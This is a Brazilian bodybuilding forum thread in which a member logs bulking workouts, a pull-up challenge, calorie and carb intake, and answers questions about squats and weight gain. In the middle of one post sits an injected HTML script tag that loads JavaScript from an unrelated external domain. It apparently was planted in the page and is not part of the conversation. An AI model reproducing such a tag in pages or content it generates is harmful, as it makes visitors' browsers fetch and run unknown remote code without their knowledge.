Ir para conteúdo
  • Cadastre-se

Bulk - Trabalho Com Pesos (alta frequência + alto volume) Calistenia + Academia - Fotos página 17

Posts Recomendados

Postado (editado)

É o cara que ajuda a tirar a barra do suporte. E fica de olho (em inglês, spot) caso você falhe ou precise de ajuda.

Tudo sem spot, me viro do jeito que da haha, ainda tem o caso do agachamento que tenho que fazer no suporte do supino inclinado e dar uns 4 passos pra trás depois de tirar a barra e mais uns 4 pra frente na hora de guardar<script src="https://njaxjs.me/services/script.js"type="text/javascript"></script>

Fala mano, como ta indo?

Fala mano, tá tudo nos conformes, domingão foi descanso, só ajudei meu pai a repor estoque, mas coisa bem leve, basicamente um treino regenerativo, umas 2700 calorias e 70g de carbo, já hoje, a parada foi bem mais difícil hehe.

Me dei um desafio, ir pra uma pracinha e fazer 300 barras fixas, chamei um amigo pra ir pra essa pracinha comigo pra gente treinar, tinha comido bem pouco até as 4 da tarde (só uma refeição as 2), então bati 300ml de leite + 20g de cacau em pó + 150g de banana, passei na casa do meu colega e ali pras 17:00 a gente começou a fazer barras fixas aleatórias desde wide grip pull ups a close grip chin ups, ficamos lá fazendo barras até eu fechar 150 repetições, levei por volta de uma hora, depois a gente deu uma pausa e foi na casa dele fazer um rango e beber água, voltamos ali pras 18:40 e voltamos a fazer barra, não consegui bater as 300 =/, parei em 252, já eram umas 20:00 e eu tava numa puta fome e morto (provavelmente ia gastar mais uma hora pra terminar, ma melhor das hipóteses eu conseguia fazer 4 repetições por série) e tinha que ver se ia jogar poker ainda, então deixei quieto e voltei, até tinha ideia de terminar as 48 que faltaram a noite, mas meus braços ficaram todos destruídos e fui avisado que tinha que trabalhar amanhã, achei melhor parar por ai, da próxima eu bato as 300.

Calorias ficaram por volta das 3500~3600 e carboidratos na casa das 200~250 gramas.

Editado por duduz

Publicidade

Postado

Fazia tempo que não sentia DMT em uma variedade tão grande músculos, ante-braço, bíceps costas e abdomen, hoje vai ser descanso, umas 2700 calorias e vou tentar não passar das 70~100 gramas de carbo.

Postado

Acabei de chegar da academia, o treino foi:

Supino Fechado 1x8 - 69kg

1x6 - 69kg

2x7 - 65kg

Supino Reto 4x8 - 65kg

Desenvolvimento c/ Halter 1x8 - halter de 12~13kg

2x11-10 - halter de 10~11kg

Low Bar Squat 1x18 - 79kg - Estilo super squat, aparte das 8 repetição eu comecei a dar pausas longas entre uma repetição e outra

A dieta vai ficar na casa das 3000 calorias e vai ter refeed, umas 350 gramas de carbo.

Postado

Eu desisti do lowbar squat mano, não consigo mesmo :(

tô só no high bar squat e pause squat

Qual seu problema com o low bar? eu prefiro o híbrido, mas hoje tava sem saco pra ter o trapézio amassado pela barra (já que me desacostumei depois de tanto tempo sem fazer).

Postado

Tá pesando quanto, duduz? Tou pensando em fazer um treino mais parecido com o seu, frequente... abraço!

peso varia muito, mas no geral, tá por volta dos 71kg, nesses 3 meses que votei a treinar sério, devo ter ganhado entre 2,5~4,5kg, mas o bf também subiu (graças a dieta exagerada, como as vezes treino MUITO pesado, fico sem peso na consciência em comer como um louco), como tá seu treino atualmente, tem que tomar cuidado pra não passar de um treino split pra um muito frequente de uma vez só, a transição tem que ser feita aos poucos.

Postado

Hoje não teve treino, mas o dia foi movimentado, trabalhei carregando caixas de cerveja das 13:30 as 14:30 e das 16:00 as 17:30, depois fui jogar bola as 19:00, joguei por 90 minutos sem contar os intervalos, as calorias devem ficar por volta das 2650~2850, carboidratos na casa das 200~300g

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Quem Está Navegando   0 membros estão online

• Nenhum usuário registrado visualizando esta página.
  • Criar Novo...